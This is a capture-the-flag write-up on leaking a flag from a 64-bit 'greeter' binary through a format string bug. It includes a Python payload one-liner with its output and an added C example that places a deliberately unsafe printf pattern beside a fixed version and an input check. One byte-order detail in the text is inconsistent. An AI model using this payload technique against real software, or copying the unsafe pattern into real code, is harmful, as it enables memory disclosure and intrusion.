This program opens flag.txt and reads its contents into memory at address 0x600ca0.
How can we read it back out? If you know format string bugs (fsb), it is simple:
put the address into the input and read from it with the format string vulnerability.
ksg@ubuntu:~/pwn/tum$ ./greeter
Hi, what's your name?
%x
Pwn harder, ffffbdc0!
The 64-bit calling convention is different from the 32-bit one.
On a 32-bit system, arguments are passed on the stack (esp): esp, esp+4, esp+8, esp+0xc, ...
On this 64-bit system they are passed in registers first and then on the stack: rdi, rsi, rdx, rcx, r8, r9, then rsp, rsp+4, rsp+8.
The input buffer lives at rsp, so if you write "\x0c\xa0\x60\0\0\0\0\0" there and have printf evaluate "%6$s",
you may get the flag.
One problem remains with this write-up: printf stops printing a string at the first null byte.
The address 0x0000000000600ca0 contains null bytes, so nothing after them is printed.
The fix is just as simple:
write the payload backwards, with the format specifier first and the address after it, so the null bytes no longer cut the format string short.
ksg@ubuntu:~/pwn/tum$ (python -c 'print " %7$s"+"\x00\x00\x00\x00\x00\x60\x0c\xa0"[::-1]') | ./greeter
Hi, what's your name?
Pwn harder, flag{flagaflasdkflskflskflskflskdl}
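As an added example (not the challenge's source, which this write-up does not include): the unsafe pattern that produces the behaviour above, where the user's name ends up as the format string, next to its fixed form, plus a small input check that flags a conversion directive in a name. Function and macro names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical greeter modelled on the target's observable behaviour. */
#define GREETING "Pwn harder, "

/* Vulnerable pattern: the name is first baked into a buffer and that buffer
 * is then used as the format string, so %x / %s / %n inside the name are
 * interpreted by the printf family. gcc -Wformat -Wformat-security reports
 * the second snprintf call because its format is not a string literal. */
int greet_unsafe(char *out, size_t out_len, const char *name)
{
    char fmt[128];
    snprintf(fmt, sizeof fmt, GREETING "%s!", name); /* "Pwn harder, <name>!" */
    return snprintf(out, out_len, fmt);              /* BUG: fmt is user-controlled */
}

/* Hardened pattern: the format string is a constant and the name is passed
 * as a %s argument, so any directives in it are printed literally. */
int greet_safe(char *out, size_t out_len, const char *name)
{
    return snprintf(out, out_len, GREETING "%s!", name);
}

/* Counts '%' characters that would start a conversion directive ("%%" is a
 * literal percent sign and is not counted). Useful for rejecting or logging
 * names that should never reach a format string. */
int count_directives(const char *s)
{
    int n = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {
            i++;          /* skip the escaped pair */
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[64];
    greet_safe(buf, sizeof buf, "%x");
    printf("safe:   %s\n", buf);        /* prints the name literally */
    greet_unsafe(buf, sizeof buf, "100%%");
    printf("unsafe: %s\n", buf);        /* "%%" collapsed to "%": input was interpreted */
    printf("directives in \"%%7$s\": %d\n", count_directives("%7$s"));
    return 0;
}
```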